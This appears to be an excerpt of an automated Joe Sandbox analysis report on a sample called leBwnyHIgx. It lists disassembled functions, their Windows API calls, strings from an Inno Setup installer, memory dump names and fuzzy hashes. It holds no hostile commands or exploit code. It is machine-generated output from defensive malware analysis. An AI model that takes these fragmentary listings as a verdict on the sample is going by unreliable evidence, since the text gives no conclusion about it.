                                                                                    Function 02715EB2 Relevance: 1.3, APIs: 1, Instructions: 15sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNEL32 ref: 02715EB2
                                                                                      • Part of subcall function 02716F17: _malloc.LIBCMT ref: 02716F31
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep_malloc
                                                                                    • String ID:
                                                                                    • API String ID: 617756273-0
                                                                                    • Opcode ID: b28fdf1a708a3e8e5ae28ab42cd171088da65a45203389186fda3c0a6aa4cd98
                                                                                    • Instruction ID: 1ca814b2acf3c39bd239bc5342026ac889617992cae6f9d08fdb1acab8e56e73
                                                                                    • Opcode Fuzzy Hash: b28fdf1a708a3e8e5ae28ab42cd171088da65a45203389186fda3c0a6aa4cd98
                                                                                    • Instruction Fuzzy Hash: 48D012F2D04227DBE7B16DB448D813E61726B50244F958536D60BA6900D6754E5CC7D3

                                                                                    Non-executed Functions

                                                                                    Function 0063E56C Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsIconic.USER32 ref: 0063E5C1
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0063E5DE
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0063E603
                                                                                      • Part of subcall function 005963F8: IsWindow.USER32 ref: 00596406
                                                                                      • Part of subcall function 005963F8: EnableWindow.USER32(?,000000FF,?,00000000,?,0063E71C,0063E737,0063E74D,?,?,000000EC,?,000000F0,?,00000000,?), ref: 00596415
                                                                                    • GetActiveWindow.USER32(00000000,0063E74D,?,?,000000EC,?,000000F0,?,00000000,?,00000000), ref: 0063E6CF
                                                                                    • SetActiveWindow.USER32(0065C5D1,0063E737,0063E74D,?,?,000000EC,?,000000F0,?,00000000,?,00000000), ref: 0063E720
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveLong$EnableIconic
                                                                                    • String ID: D.S$Dc$`$qc
                                                                                    • API String ID: 4222481217-1700508051
                                                                                    • Opcode ID: 105bf1b043794c7febb61f28ddb640e4e5e1409b569c658a6f2acf29d1ee32be
                                                                                    • Instruction ID: a68385297073a1787c46507cafb47a44eecf45f015a0fdb6403bc58eaa920278
                                                                                    • Opcode Fuzzy Hash: 105bf1b043794c7febb61f28ddb640e4e5e1409b569c658a6f2acf29d1ee32be
                                                                                    • Instruction Fuzzy Hash: 64518C74A00249AFDB00DFA9C885ADEBBF6FB09314F154169F804EB391D776A941CFA0
                                                                                    Function 0040C2A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,0041AD90,?,?), ref: 0040C2BD
                                                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040C2CE
                                                                                    • FindFirstFileW.KERNEL32(?,?,kernel32.dll,0041AD90,?,?), ref: 0040C3CE
                                                                                    • FindClose.KERNEL32(?,?,?,kernel32.dll,0041AD90,?,?), ref: 0040C3E0
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,0041AD90,?,?), ref: 0040C3EC
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,0041AD90,?,?), ref: 0040C431
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                    • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                    • API String ID: 1930782624-3908791685
                                                                                    • Opcode ID: c34afadf3db2e7f96e5d8f57f2f71db68a35707ef3791a46efc30f5c96551beb
                                                                                    • Instruction ID: 129811935084e97536274d2d3cc39016278ad45ca87abc2192b8d5c1b695ba56
                                                                                    • Opcode Fuzzy Hash: c34afadf3db2e7f96e5d8f57f2f71db68a35707ef3791a46efc30f5c96551beb
                                                                                    • Instruction Fuzzy Hash: 8841A471E00518DBCB10EBA4C8C5ADE73B5AF44310F5586BAD504F73C1E778AE458A8D
                                                                                    Function 005FA9A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 005FA9B8
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 005FA9BE
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 005FA9D7
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 005FA9FE
                                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 005FAA03
                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 005FAA14
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                    • String ID: SeShutdownPrivilege
                                                                                    • API String ID: 107509674-3733053543
                                                                                    • Opcode ID: 85845749144dc9ce82d9e1a4bab315e58eda8b3d9d64f424d5201a4268532a52
                                                                                    • Instruction ID: 775351c24a523f7ca86ab9856cb2a99195e947980098857579868bc878f92e5d
                                                                                    • Opcode Fuzzy Hash: 85845749144dc9ce82d9e1a4bab315e58eda8b3d9d64f424d5201a4268532a52
                                                                                    • Instruction Fuzzy Hash: D9F062B068430675E610E6718E07FBE2588AB40B48F900C1AF789E50D2E7ADD4588677
                                                                                    Function 00650754 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00650891,?,0066978C,?,?,00650A46,00000000,00650A9A,?,00000000,00000000,00000000), ref: 006507A5
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000010), ref: 00650828
                                                                                    • FindNextFileW.KERNEL32(000000FF,?,00000000,00650864,?,00000000,?,00000000,00650891,?,0066978C,?,?,00650A46,00000000,00650A9A), ref: 00650840
                                                                                    • FindClose.KERNEL32(000000FF,0065086B,00650864,?,00000000,?,00000000,00650891,?,0066978C,?,?,00650A46,00000000,00650A9A), ref: 0065085E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirstNext
                                                                                    • String ID: isRS-$isRS-???.tmp
                                                                                    • API String ID: 134685335-3422211394
                                                                                    • Opcode ID: be8c0e228b3abfe7e50919e35dd7b0217464954728c07ec5518a4ebc0377dcf2
                                                                                    • Instruction ID: 7e40c14d5cf5c67ddc04c5ae91bd146497d11b7686551e4e99c720dcad4bb53e
                                                                                    • Opcode Fuzzy Hash: be8c0e228b3abfe7e50919e35dd7b0217464954728c07ec5518a4ebc0377dcf2
                                                                                    • Instruction Fuzzy Hash: 4F319471A0061C9FEF10EB65CC45ADEB7F9EB88305F5145FAE804B3291EA389E84CE54
                                                                                    Function 005B261C Relevance: 9.1, APIs: 6, Instructions: 98windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsIconic.USER32 ref: 005B2661
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 005B267E
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005B26A3
                                                                                    • GetActiveWindow.USER32(?,000000EC,?,000000F0,?,00000000,005B2742,?,?,00000000), ref: 005B26B1
                                                                                    • MessageBoxW.USER32 ref: 005B26DE
                                                                                    • SetActiveWindow.USER32(?,005B270C,-0000002D,00000000,005B2705,?,?,000000EC,?,000000F0,?,00000000,005B2742,?,?,00000000), ref: 005B26FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveLong$IconicMessage
                                                                                    • String ID:
                                                                                    • API String ID: 1633107849-0
                                                                                    • Opcode ID: 358b33491ddebdf2595299d0a193073ac980c33294565c75b2cc6163bf35f257
                                                                                    • Instruction ID: 0959946ea7ea2d423f2b07d1ac2efebd9c7287cb6bf5dae26c143587a2194954
                                                                                    • Opcode Fuzzy Hash: 358b33491ddebdf2595299d0a193073ac980c33294565c75b2cc6163bf35f257
                                                                                    • Instruction Fuzzy Hash: 89318B34A04605AFDB00EFA9DD86EDE7BE9FB49350F5045A5F410E73A1DA78AD00DB24
                                                                                    Function 0061A76C Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 187pipeprocessfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 0061A7D4
                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,0061AA67,?,?,?,00000000,?,0061B466,?,?,00000000), ref: 0061A7DD
                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0061A7E7
                                                                                    • GetCurrentProcessId.KERNEL32(?,?,00000000,0061AA67,?,?,?,00000000,?,0061B466,?,?,00000000), ref: 0061A7F0
                                                                                    • CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0061A866
                                                                                    • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0061A874
                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000000,00661F70,00000003,00000000,00000000,00000000,0061AA23,?,00000000,40080003,00000006,00000001,00002000,00002000), ref: 0061A8BC
                                                                                    • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0061AA12,?,00000000,C0000000,00000000,00661F70,00000003,00000000,00000000,00000000,0061AA23), ref: 0061A8F5
                                                                                      • Part of subcall function 005B09C4: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005B09D7
                                                                                    • CreateProcessW.KERNEL32 ref: 0061A99E
                                                                                    • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0061A9D4
                                                                                    • CloseHandle.KERNEL32(000000FF,0061AA19,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 0061AA0C
                                                                                      • Part of subcall function 005F84D8: GetLastError.KERNEL32(00000000,005F91EE,00000005,00000000,005F9216,?,?,0066978C,?,00000000,00000000,00000000,?,00650A7F,00000000,00650A9A), ref: 005F84DB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                    • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                    • API String ID: 770386003-3271284199
                                                                                    • Opcode ID: 8b417e6bfe7b416bc203fcebf180cb54b99f1040917cd1cd9b5e41bc12d13ce3
                                                                                    • Instruction ID: 3503b57a197a75d7cee75c72a57885d42cb6c05f4df10585553db908d6458071
                                                                                    • Opcode Fuzzy Hash: 8b417e6bfe7b416bc203fcebf180cb54b99f1040917cd1cd9b5e41bc12d13ce3
                                                                                    • Instruction Fuzzy Hash: 94713270A003499FEB10DFA9CC45BEEBBF5AB05704F1445A9F508EB392D7749980CB66
                                                                                    Function 005B1248 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 181memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AllocateAndInitializeSid.ADVAPI32(00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B128A
                                                                                    • GetVersion.KERNEL32(00000000,005B1433,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B12A7
                                                                                    • GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,005B1433,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B12C1
                                                                                    • FreeSid.ADVAPI32(00000000,005B143A,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B142D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateFreeHandleInitializeModuleVersion
                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                    • API String ID: 4173726493-1888249752
                                                                                    • Opcode ID: 952df93399f65c742f00ad26f12ea1d2db98546042352c41d8bfdd11bcdf1fbe
                                                                                    • Instruction ID: ac35d0f59487471c61e1a1342d4049f29feb693cc75a8e69d60280a94490ce98
                                                                                    • Opcode Fuzzy Hash: 952df93399f65c742f00ad26f12ea1d2db98546042352c41d8bfdd11bcdf1fbe
                                                                                    • Instruction Fuzzy Hash: 7C519671A44705AADF51DBE58C62BFF7BE8FF05344F90082AFA00E7191E638E9408769
                                                                                    Function 00650AA8 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 260COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(?,00000005,00000000,00650E6B,?,?,00000000,?,00000000,00000000,?,0065134E,00000000,00651358,?,00000000), ref: 00650B2F
                                                                                    • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00650E6B,?,?,00000000,?,00000000,00000000), ref: 00650B55
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000004FF,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00650E6B), ref: 00650B76
                                                                                    • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00650E6B,?,?,00000000,?,00000000), ref: 00650B8B
                                                                                      • Part of subcall function 005B0518: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005B05AD,?,?,?,00000001,?,005FB63E,00000000,005FB6A9), ref: 005B054D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow$FileModuleMultipleNameObjectsWait
                                                                                    • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                    • API String ID: 66301061-3672972446
                                                                                    • Opcode ID: 11ff9a5d668dd4f2d7e6ff84b01d56f7ef7fac016dca03f85604f83c2993ff07
                                                                                    • Instruction ID: 454a7f8a8ebd9c9c0472cbc412e74aa99abd709555709b689d3e6ddf3cb357b8
                                                                                    • Opcode Fuzzy Hash: 11ff9a5d668dd4f2d7e6ff84b01d56f7ef7fac016dca03f85604f83c2993ff07
                                                                                    • Instruction Fuzzy Hash: 9491E430A042099FEB10EBA4C856BEEBBF6EF49301F614864FD00A7791DA75ED49CB54
                                                                                    Function 00643E0C Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 223COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoTaskMemFree.OLE32(?,00644047,?,00000000,00000000,?,0064F4D6,00000006,?,00000000,0064FAA0,?,00000000,0064FB5F), ref: 0064403A
                                                                                    • CoTaskMemFree.OLE32(?,0064409A,?,00000000,00000000,?,0064F4D6,00000006,?,00000000,0064FAA0,?,00000000,0064FB5F), ref: 0064408D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
